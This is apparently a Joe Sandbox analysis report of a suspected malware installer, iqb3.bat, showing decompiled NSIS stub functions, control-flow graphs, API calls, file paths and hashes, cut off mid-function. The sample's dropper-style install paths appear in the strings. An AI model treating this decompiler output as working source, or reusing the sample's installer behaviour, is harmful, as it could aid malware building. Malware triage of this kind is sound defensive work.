                                                                      control_flow_graph 267 403767-40377f call 406009 270 403781-403791 call 405c3c 267->270 271 403793-4037c4 call 405bc5 267->271 280 4037e7-403810 call 403a2c call 40585c 270->280 276 4037c6-4037d7 call 405bc5 271->276 277 4037dc-4037e2 lstrcatA 271->277 276->277 277->280 285 403816-40381b 280->285 286 403897-40389f call 40585c 280->286 285->286 288 40381d-403835 call 405bc5 285->288 292 4038a1-4038a8 call 405d00 286->292 293 4038ad-4038d2 LoadImageA 286->293 291 40383a-403841 288->291 291->286 294 403843-403845 291->294 292->293 296 403953-40395b call 40140b 293->296 297 4038d4-403904 RegisterClassA 293->297 298 403856-403862 lstrlenA 294->298 299 403847-403854 call 405799 294->299 310 403965-403970 call 403a2c 296->310 311 40395d-403960 296->311 300 403a22 297->300 301 40390a-40394e SystemParametersInfoA CreateWindowExA 297->301 305 403864-403872 lstrcmpiA 298->305 306 40388a-403892 call 40576e call 405cde 298->306 299->298 303 403a24-403a2b 300->303 301->296 305->306 309 403874-40387e GetFileAttributesA 305->309 306->286 313 403880-403882 309->313 314 403884-403885 call 4057b5 309->314 320 403976-403993 ShowWindow LoadLibraryA 310->320 321 4039f9-4039fa call 40509b 310->321 311->303 313->306 313->314 314->306 323 403995-40399a LoadLibraryA 320->323 324 40399c-4039ae GetClassInfoA 320->324 327 4039ff-403a01 321->327 323->324 325 4039b0-4039c0 GetClassInfoA RegisterClassA 324->325 326 4039c6-4039e9 DialogBoxParamA call 40140b 324->326 325->326 331 4039ee-4039f7 call 4036b7 326->331 329 403a03-403a09 327->329 330 403a1b-403a1d call 40140b 327->330 329->311 332 403a0f-403a16 call 40140b 329->332 330->300 331->303 332->311
                                                                      C-Code - Quality: 96%
                                                                      			E00403767() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t17;
				void* _t25;
				void* _t27;
				int _t28;
				void* _t31;
				struct HINSTANCE__* _t34;
				int _t35;
				intOrPtr _t36;
				int _t39;
				char _t57;
				CHAR* _t59;
				signed char _t63;
				CHAR* _t74;
				intOrPtr _t76;
				CHAR* _t82;

				_t76 =  *0x4236f0;
				_t17 = E00406009(6);
				_t84 = _t17;
				if(_t17 == 0) {
					_t74 = 0x41fce0;
					"1033" = 0x30;
					 *0x42a001 = 0x78;
					 *0x42a002 = 0;
					E00405BC5(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x41fce0, 0);
					__eflags =  *0x41fce0; // 0x42
					if(__eflags == 0) {
						E00405BC5(0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040730E, 0x41fce0, 0);
					}
					lstrcatA("1033", _t74);
				} else {
					E00405C3C("1033",  *_t17() & 0x0000ffff);
				}
				E00403A2C(_t71, _t84);
				_t81 = "C:\\Users\\engineer\\Vkstcentrene\\unprotuberant";
				 *0x423760 =  *0x4236f8 & 0x00000020;
				 *0x42377c = 0x10000;
				if(E0040585C(_t84, "C:\\Users\\engineer\\Vkstcentrene\\unprotuberant") != 0) {
					L16:
					if(E0040585C(_t92, _t81) == 0) {
						E00405D00(0, _t74, _t76, _t81,  *((intOrPtr*)(_t76 + 0x118))); // executed
					}
					_t25 = LoadImageA( *0x4236e0, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x422ec8 = _t25;
					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t27 = E00403A2C(_t71, __eflags);
							__eflags =  *0x423780;
							if( *0x423780 != 0) {
								_t28 = E0040509B(_t27, 0);
								__eflags = _t28;
								if(_t28 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x422eac; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x41fcc0, 5); // executed
							_t34 = LoadLibraryA("RichEd20"); // executed
							__eflags = _t34;
							if(_t34 == 0) {
								LoadLibraryA("RichEd32");
							}
							_t82 = "RichEdit20A";
							_t35 = GetClassInfoA(0, _t82, 0x422e80);
							__eflags = _t35;
							if(_t35 == 0) {
								GetClassInfoA(0, "RichEdit", 0x422e80);
								 *0x422ea4 = _t82;
								RegisterClassA(0x422e80);
							}
							_t36 =  *0x422ec0; // 0x0
							_t39 = DialogBoxParamA( *0x4236e0, _t36 + 0x00000069 & 0x0000ffff, 0, E00403AF9, 0); // executed
							E004036B7(E0040140B(5), 1);
							return _t39;
						}
						L22:
						_t31 = 2;
						return _t31;
					} else {
						_t71 =  *0x4236e0;
						 *0x422e84 = E00401000;
						 *0x422e90 =  *0x4236e0;
						 *0x422e94 = _t25;
						 *0x422ea4 = 0x409208;
						if(RegisterClassA(0x422e80) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoA(0x30, 0,  &_v16, 0);
						 *0x41fcc0 = CreateWindowExA(0x80, 0x409208, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x4236e0, 0);
						goto L21;
					}
				} else {
					_t71 =  *(_t76 + 0x48);
					if(_t71 == 0) {
						goto L16;
					}
					_t74 = 0x422680;
					E00405BC5( *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x423718, 0x422680, 0);
					_t57 =  *0x422680; // 0x43
					if(_t57 == 0) {
						goto L16;
					}
					if(_t57 == 0x22) {
						_t74 = 0x422681;
						 *((char*)(E00405799(0x422681, 0x22))) = 0;
					}
					_t59 = lstrlenA(_t74) + _t74 - 4;
					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
						L15:
						E00405CDE(_t81, E0040576E(_t74));
						goto L16;
					} else {
						_t63 = GetFileAttributesA(_t74);
						if(_t63 == 0xffffffff) {
							L14:
							E004057B5(_t74);
							goto L15;
						}
						_t92 = _t63 & 0x00000010;
						if((_t63 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

























                                                                      0x0040376d
                                                                      0x00403776
                                                                      0x0040377d
                                                                      0x0040377f
                                                                      0x00403793
                                                                      0x004037a5
                                                                      0x004037ac
                                                                      0x004037b3
                                                                      0x004037b9
                                                                      0x004037be
                                                                      0x004037c4
                                                                      0x004037d7
                                                                      0x004037d7
                                                                      0x004037e2
                                                                      0x00403781
                                                                      0x0040378c
                                                                      0x0040378c
                                                                      0x004037e7
                                                                      0x004037f1
                                                                      0x004037fa
                                                                      0x004037ff
                                                                      0x00403810
                                                                      0x00403897
                                                                      0x0040389f
                                                                      0x004038a8
                                                                      0x004038a8
                                                                      0x004038be
                                                                      0x004038c4
                                                                      0x004038d2
                                                                      0x00403953
                                                                      0x0040395b
                                                                      0x00403965
                                                                      0x0040396a
                                                                      0x00403970
                                                                      0x004039fa
                                                                      0x004039ff
                                                                      0x00403a01
                                                                      0x00403a1d
                                                                      0x00000000
                                                                      0x00403a1d
                                                                      0x00403a03
                                                                      0x00403a09
                                                                      0x00403a11
                                                                      0x00403a11
                                                                      0x00000000
                                                                      0x00403a09
                                                                      0x0040397e
                                                                      0x0040398f
                                                                      0x00403991
                                                                      0x00403993
                                                                      0x0040399a
                                                                      0x0040399a
                                                                      0x004039a2
                                                                      0x004039aa
                                                                      0x004039ac
                                                                      0x004039ae
                                                                      0x004039b7
                                                                      0x004039ba
                                                                      0x004039c0
                                                                      0x004039c0
                                                                      0x004039c6
                                                                      0x004039df
                                                                      0x004039f0
                                                                      0x00000000
                                                                      0x004039f5
                                                                      0x0040395d
                                                                      0x0040395f
                                                                      0x00000000
                                                                      0x004038d4
                                                                      0x004038d4
                                                                      0x004038e0
                                                                      0x004038ea
                                                                      0x004038f0
                                                                      0x004038f5
                                                                      0x00403904
                                                                      0x00403a22
                                                                      0x00403a22
                                                                      0x00000000
                                                                      0x00403a22
                                                                      0x00403913
                                                                      0x0040394e
                                                                      0x00000000
                                                                      0x0040394e
                                                                      0x00403816
                                                                      0x00403816
                                                                      0x0040381b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403825
                                                                      0x00403835
                                                                      0x0040383a
                                                                      0x00403841
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403845
                                                                      0x00403847
                                                                      0x00403854
                                                                      0x00403854
                                                                      0x0040385c
                                                                      0x00403862
                                                                      0x0040388a
                                                                      0x00403892
                                                                      0x00000000
                                                                      0x00403874
                                                                      0x00403875
                                                                      0x0040387e
                                                                      0x00403884
                                                                      0x00403885
                                                                      0x00000000
                                                                      0x00403885
                                                                      0x00403880
                                                                      0x00403882
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403882
                                                                      0x00403862

                                                                      APIs
                                                                        • Part of subcall function 00406009: GetModuleHandleA.KERNEL32(?,?,?,0040325C,00000008), ref: 0040601B
                                                                        • Part of subcall function 00406009: LoadLibraryA.KERNELBASE(?,?,?,0040325C,00000008), ref: 00406026
                                                                        • Part of subcall function 00406009: GetProcAddress.KERNEL32(00000000,?), ref: 00406037
                                                                      • lstrcatA.KERNEL32(1033,Bogtilrettelgnings82 Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Bogtilrettelgnings82 Setup: Installing,00000000,00000006,C:\Users\user\AppData\Local\Temp\,746AFA90,"C:\Users\Public\iqb3.bat" ,00000000), ref: 004037E2
                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,?,?,?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00000000,C:\Users\user\Vkstcentrene\unprotuberant,1033,Bogtilrettelgnings82 Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Bogtilrettelgnings82 Setup: Installing,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 00403857
                                                                      • lstrcmpiA.KERNEL32(?,.exe,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,?,?,?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00000000,C:\Users\user\Vkstcentrene\unprotuberant,1033,Bogtilrettelgnings82 Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Bogtilrettelgnings82 Setup: Installing,00000000), ref: 0040386A
                                                                      • GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade), ref: 00403875
                                                                      • LoadImageA.USER32 ref: 004038BE
                                                                        • Part of subcall function 00405C3C: wsprintfA.USER32 ref: 00405C49
                                                                      • RegisterClassA.USER32 ref: 004038FB
                                                                      • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403913
                                                                      • CreateWindowExA.USER32 ref: 00403948
                                                                      • ShowWindow.USER32(00000005,00000000), ref: 0040397E
                                                                      • LoadLibraryA.KERNELBASE(RichEd20), ref: 0040398F
                                                                      • LoadLibraryA.KERNEL32(RichEd32), ref: 0040399A
                                                                      • GetClassInfoA.USER32 ref: 004039AA
                                                                      • GetClassInfoA.USER32 ref: 004039B7
                                                                      • RegisterClassA.USER32 ref: 004039C0
                                                                      • DialogBoxParamA.USER32 ref: 004039DF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                      • String ID: "C:\Users\Public\iqb3.bat" $.DEFAULT\Control Panel\International$.exe$1033$Bogtilrettelgnings82 Setup: Installing$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade$C:\Users\user\Vkstcentrene\unprotuberant$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                      • API String ID: 914957316-894414359
                                                                      • Opcode ID: ea6de073139d456b46fed141b228fdd8787a9c88dc78c00038b2e5e02956a85b
                                                                      • Instruction ID: f2042b1b728b60748b23566834e767a2e9ab566c559d5d3ffbf72b6bfa23c0d9
                                                                      • Opcode Fuzzy Hash: ea6de073139d456b46fed141b228fdd8787a9c88dc78c00038b2e5e02956a85b
                                                                      • Instruction Fuzzy Hash: 4861E4716442007EE320AF659D45F2B3EACEB4474AF40457FF940B22E2D7BD6D029A2E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00402C79 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 338 402c79-402cc7 GetTickCount GetModuleFileNameA call 40596f 341 402cd3-402d01 call 405cde call 4057b5 call 405cde GetFileSize 338->341 342 402cc9-402cce 338->342 350 402df1-402dff call 402bda 341->350 351 402d07-402d1e 341->351 343 402f18-402f1c 342->343 358 402ed0-402ed5 350->358 359 402e05-402e08 350->359 353 402d20 351->353 354 402d22-402d2f call 4031b6 351->354 353->354 360 402d35-402d3b 354->360 361 402e8c-402e94 call 402bda 354->361 358->343 362 402e34-402e80 GlobalAlloc call 4060e9 call 40599e CreateFileA 359->362 363 402e0a-402e22 call 4031cc call 4031b6 359->363 364 402dbb-402dbf 360->364 365 402d3d-402d55 call 40592a 360->365 361->358 389 402e82-402e87 362->389 390 402e96-402ec6 call 4031cc call 402f1f 362->390 363->358 386 402e28-402e2e 363->386 369 402dc1-402dc7 call 402bda 364->369 370 402dc8-402dce 364->370 365->370 384 402d57-402d5e 365->384 369->370 377 402dd0-402dde call 40607b 370->377 378 402de1-402deb 370->378 377->378 378->350 378->351 384->370 388 402d60-402d67 384->388 386->358 386->362 388->370 391 402d69-402d70 388->391 389->343 397 402ecb-402ece 390->397 391->370 393 402d72-402d79 391->393 393->370 395 402d7b-402d9b 393->395 395->358 398 402da1-402da5 395->398 397->358 399 402ed7-402ee8 397->399 400 402da7-402dab 398->400 401 402dad-402db5 398->401 402 402ef0-402ef5 399->402 403 402eea 399->403 400->350 400->401 401->370 404 402db7-402db9 401->404 405 402ef6-402efc 402->405 403->402 404->370 405->405 406 402efe-402f16 call 40592a 405->406 406->343
                                                                      C-Code - Quality: 96%
                                                                      			E00402C79(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v300;
				signed int _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				signed int _t77;
				signed int _t82;
				signed int _t83;
				signed int _t89;
				intOrPtr _t92;
				signed int _t101;
				signed int _t103;
				void* _t105;
				signed int _t106;
				signed int _t109;
				void* _t110;

				_v8 = 0;
				_v12 = 0;
				 *0x4236ec = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\Public\\iqb3.bat", 0x400);
				_t105 = E0040596F("C:\\Users\\Public\\iqb3.bat", 0x80000000, 3);
				 *0x409018 = _t105;
				if(_t105 == 0xffffffff) {
					return "Error launching installer";
				}
				E00405CDE("C:\\Users\\Public", "C:\\Users\\Public\\iqb3.bat");
				E00405CDE(0x42b000, E004057B5("C:\\Users\\Public"));
				_t54 = GetFileSize(_t105, 0);
				__eflags = _t54;
				 *0x41e898 = _t54;
				_t109 = _t54;
				if(_t54 <= 0) {
					L22:
					E00402BDA(1);
					__eflags =  *0x4236f4;
					if( *0x4236f4 == 0) {
						goto L30;
					}
					__eflags = _v12;
					if(_v12 == 0) {
						L26:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t110 = _t57;
						E004060E9(0x40a800);
						E0040599E( &_v300, "C:\\Users\\engineer\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						__eflags = _t62 - 0xffffffff;
						 *0x40901c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E004031CC( *0x4236f4 + 0x1c);
							 *0x41e89c = _t65;
							 *0x416890 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00402F1F(_v16, 0xffffffff, 0, _t110, _v20); // executed
							__eflags = _t68 - _v20;
							if(_t68 == _v20) {
								__eflags = _v40 & 0x00000001;
								 *0x4236f0 = _t110;
								 *0x4236f8 =  *_t110;
								if((_v40 & 0x00000001) != 0) {
									 *0x4236fc =  *0x4236fc + 1;
									__eflags =  *0x4236fc;
								}
								_t45 = _t110 + 0x44; // 0x44
								_t70 = _t45;
								_t101 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t110;
									_t101 = _t101 - 1;
									__eflags = _t101;
								} while (_t101 != 0);
								_t71 =  *0x41688c; // 0x44ff
								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
								E0040592A(0x423700, _t110 + 4, 0x40);
								__eflags = 0;
								return 0;
							}
							goto L30;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004031CC( *0x416888);
					_t77 = E004031B6( &_a4, 4);
					__eflags = _t77;
					if(_t77 == 0) {
						goto L30;
					}
					__eflags = _v8 - _a4;
					if(_v8 != _a4) {
						goto L30;
					}
					goto L26;
				} else {
					do {
						_t106 = _t109;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x4236f4) & 0x00007e00) + 0x200;
						__eflags = _t109 - _t82;
						if(_t109 >= _t82) {
							_t106 = _t82;
						}
						_t83 = E004031B6(0x416898, _t106);
						__eflags = _t83;
						if(_t83 == 0) {
							E00402BDA(1);
							L30:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x4236f4;
						if( *0x4236f4 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402BDA(0);
							}
							goto L19;
						}
						E0040592A( &_v40, 0x416898, 0x1c);
						_t89 = _v40;
						__eflags = _t89 & 0xfffffff0;
						if((_t89 & 0xfffffff0) != 0) {
							goto L19;
						}
						__eflags = _v36 - 0xdeadbeef;
						if(_v36 != 0xdeadbeef) {
							goto L19;
						}
						__eflags = _v24 - 0x74736e49;
						if(_v24 != 0x74736e49) {
							goto L19;
						}
						__eflags = _v28 - 0x74666f73;
						if(_v28 != 0x74666f73) {
							goto L19;
						}
						__eflags = _v32 - 0x6c6c754e;
						if(_v32 != 0x6c6c754e) {
							goto L19;
						}
						_a4 = _a4 | _t89;
						_t103 =  *0x416888; // 0x23753
						 *0x423780 =  *0x423780 | _a4 & 0x00000002;
						_t92 = _v16;
						__eflags = _t92 - _t109;
						 *0x4236f4 = _t103;
						if(_t92 > _t109) {
							goto L30;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L15:
							_v12 = _v12 + 1;
							_t109 = _t92 - 4;
							__eflags = _t106 - _t109;
							if(_t106 > _t109) {
								_t106 = _t109;
							}
							goto L19;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							goto L22;
						}
						goto L15;
						L19:
						__eflags = _t109 -  *0x41e898; // 0x1be16
						if(__eflags < 0) {
							_v8 = E0040607B(_v8, 0x416898, _t106);
						}
						 *0x416888 =  *0x416888 + _t106;
						_t109 = _t109 - _t106;
						__eflags = _t109;
					} while (_t109 > 0);
					goto L22;
				}
			}































                                                                      0x00402c87
                                                                      0x00402c8a
                                                                      0x00402ca4
                                                                      0x00402ca9
                                                                      0x00402cbc
                                                                      0x00402cc1
                                                                      0x00402cc7
                                                                      0x00000000
                                                                      0x00402cc9
                                                                      0x00402cda
                                                                      0x00402ceb
                                                                      0x00402cf2
                                                                      0x00402cf8
                                                                      0x00402cfa
                                                                      0x00402cff
                                                                      0x00402d01
                                                                      0x00402df1
                                                                      0x00402df3
                                                                      0x00402df8
                                                                      0x00402dff
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00402e05
                                                                      0x00402e08
                                                                      0x00402e34
                                                                      0x00402e39
                                                                      0x00402e44
                                                                      0x00402e46
                                                                      0x00402e57
                                                                      0x00402e72
                                                                      0x00402e78
                                                                      0x00402e7b
                                                                      0x00402e80
                                                                      0x00402e9f
                                                                      0x00402eaf
                                                                      0x00402ec1
                                                                      0x00402ec6
                                                                      0x00402ecb
                                                                      0x00402ece
                                                                      0x00402ed7
                                                                      0x00402edb
                                                                      0x00402ee3
                                                                      0x00402ee8
                                                                      0x00402eea
                                                                      0x00402eea
                                                                      0x00402eea
                                                                      0x00402ef2
                                                                      0x00402ef2
                                                                      0x00402ef5
                                                                      0x00402ef6
                                                                      0x00402ef6
                                                                      0x00402ef9
                                                                      0x00402efb
                                                                      0x00402efb
                                                                      0x00402efb
                                                                      0x00402efe
                                                                      0x00402f05
                                                                      0x00402f11
                                                                      0x00402f16
                                                                      0x00000000
                                                                      0x00402f16
                                                                      0x00000000
                                                                      0x00402ece
                                                                      0x00000000
                                                                      0x00402e82
                                                                      0x00402e10
                                                                      0x00402e1b
                                                                      0x00402e20
                                                                      0x00402e22
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00402e2b
                                                                      0x00402e2e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00402d07
                                                                      0x00402d07
                                                                      0x00402d0c
                                                                      0x00402d10
                                                                      0x00402d17
                                                                      0x00402d1c
                                                                      0x00402d1e
                                                                      0x00402d20
                                                                      0x00402d20
                                                                      0x00402d28
                                                                      0x00402d2d
                                                                      0x00402d2f
                                                                      0x00402e8e
                                                                      0x00402ed0
                                                                      0x00000000
                                                                      0x00402ed0
                                                                      0x00402d35
                                                                      0x00402d3b
                                                                      0x00402dbb
                                                                      0x00402dbf
                                                                      0x00402dc2
                                                                      0x00402dc7
                                                                      0x00000000
                                                                      0x00402dbf
                                                                      0x00402d48
                                                                      0x00402d4d
                                                                      0x00402d50
                                                                      0x00402d55
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00402d57
                                                                      0x00402d5e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00402d60
                                                                      0x00402d67
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00402d69
                                                                      0x00402d70
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00402d72
                                                                      0x00402d79
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00402d7b
                                                                      0x00402d81
                                                                      0x00402d8a
                                                                      0x00402d90
                                                                      0x00402d93
                                                                      0x00402d95
                                                                      0x00402d9b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00402da1
                                                                      0x00402da5
                                                                      0x00402dad
                                                                      0x00402dad
                                                                      0x00402db0
                                                                      0x00402db3
                                                                      0x00402db5
                                                                      0x00402db7
                                                                      0x00402db7
                                                                      0x00000000
                                                                      0x00402db5
                                                                      0x00402da7
                                                                      0x00402dab
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00402dc8
                                                                      0x00402dc8
                                                                      0x00402dce
                                                                      0x00402dde
                                                                      0x00402dde
                                                                      0x00402de1
                                                                      0x00402de7
                                                                      0x00402de9
                                                                      0x00402de9
                                                                      0x00000000
                                                                      0x00402d07

                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 00402C8D
                                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\iqb3.bat,00000400), ref: 00402CA9
                                                                        • Part of subcall function 0040596F: GetFileAttributesA.KERNELBASE(00000003,00402CBC,C:\Users\Public\iqb3.bat,80000000,00000003), ref: 00405973
                                                                        • Part of subcall function 0040596F: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405995
                                                                      • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\Public,C:\Users\Public,C:\Users\Public\iqb3.bat,C:\Users\Public\iqb3.bat,80000000,00000003), ref: 00402CF2
                                                                      • GlobalAlloc.KERNELBASE(00000040,00409130), ref: 00402E39
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                      • String ID: "C:\Users\Public\iqb3.bat" $C:\Users\Public$C:\Users\Public\iqb3.bat$C:\Users\user\AppData\Local\Temp\$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                      • API String ID: 2803837635-917766113
                                                                      • Opcode ID: 0a233f6e3d580d779bc0ae37bc8a4ec036fbaf894395ff1e26bd82aff2214665
                                                                      • Instruction ID: f333638810b0fcdd6804239d6ce5d4266c39632cb53516581565939923b004a1
                                                                      • Opcode Fuzzy Hash: 0a233f6e3d580d779bc0ae37bc8a4ec036fbaf894395ff1e26bd82aff2214665
                                                                      • Instruction Fuzzy Hash: BA61E271A40205ABDB21AF64DE89F9A76B8EB00315F20413BF504F72C1D7BC9D409B9C
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040173F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147stringtimeCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      C-Code - Quality: 77%
                                                                      			E0040173F(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				CHAR* _t83;
				void* _t85;

				_t75 = __ebx;
				_t82 = E004029FD(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
				_t33 = E004057DB(_t82);
				_push(_t82);
				_t83 = "13230";
				if(_t33 == 0) {
					lstrcatA(E0040576E(E00405CDE(_t83, "C:\\Users\\engineer\\Vkstcentrene\\unprotuberant\\Benediktinerklostrets\\Rehandles\\Abortionist\\Korses")), ??);
				} else {
					E00405CDE();
				}
				E00405F49(_t83);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405FE2(_t83);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x18);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E0040594A(_t83);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E0040596F(_t83, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0x34) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404FC9(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
